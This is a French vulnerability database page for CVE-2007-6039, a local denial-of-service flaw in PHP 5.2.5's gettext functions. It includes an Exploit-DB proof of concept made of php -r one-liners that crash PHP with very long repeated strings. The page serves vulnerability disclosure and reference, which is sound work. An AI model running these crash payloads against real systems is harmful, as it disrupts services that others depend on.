CVE-2007-6039 : Détail

CVE-2007-6039

A03-Injection
0.11%V3
Local
2007-11-20 18:00 +00:00
2018-10-15 18:57 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

PHP 5.2.5 and earlier allows context-dependent attackers to cause a denial of service (application crash) via a long string in (1) the domain parameter to the dgettext function, the message parameter to the (2) dcgettext or (3) gettext function, the msgid1 parameter to the (4) dngettext or (5) ngettext function, or (6) the classname parameter to the stream_wrapper_register function. NOTE: this might not be a vulnerability in most web server environments that support multiple threads, unless this issue can be demonstrated for code execution.

Informations

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 30760

Date de publication : 2007-11-12 23:00 +00:00
Auteur : laurent gaffie
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/26428/info PHP is prone to multiple denial-of-service vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. Attackers can exploit these issues to cause denial-of-service conditions. Given the nature of these issues, attackers may also be able to execute arbitrary code, but this has not been confirmed. PHP 5.2.5 is vulnerable; other versions may also be affected. Proof of concept example : root@unsafebox:/# uname -a Linux unsafebox 2.6.20-16-generic #2 SMP Sun Sep 23 19:50:39 UTC 2007 i686 GNU/Linux root@unsafebox:/# php -v PHP 5.2.5 (cli) (built: Nov 11 2007 07:56:04) Copyright (c) 1997-2007 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies root@unsafebox:/# php -r 'dgettext(str_repeat("A",8476509),"hi");' Erreur de segmentation (core dumped) root@unsafebox:/# php -r 'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");' Erreur de segmentation (core dumped) root@unsafebox:/# php -r 'dngettext("hi",str_repeat("A",8476509),"hi",-1);' Erreur de segmentation (core dumped) root@unsafebox:/# php -r 'gettext(str_repeat("A",8476509));' Erreur de segmentation (core dumped) root@unsafebox:/# php -r 'ngettext(str_repeat("A",8476509),"hi",-1);' Erreur de segmentation (core dumped) root@unsafebox:/# php -r 'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");' Erreur de segmentation (core dumped)

Products Mentioned

Configuraton 0

Php>>Php >> Version To (including) 5.2.4

References

http://www.securityfocus.com/bid/26428
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/3365
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/26426
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/3366
Tags : third-party-advisory, x_refsource_SREASON
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.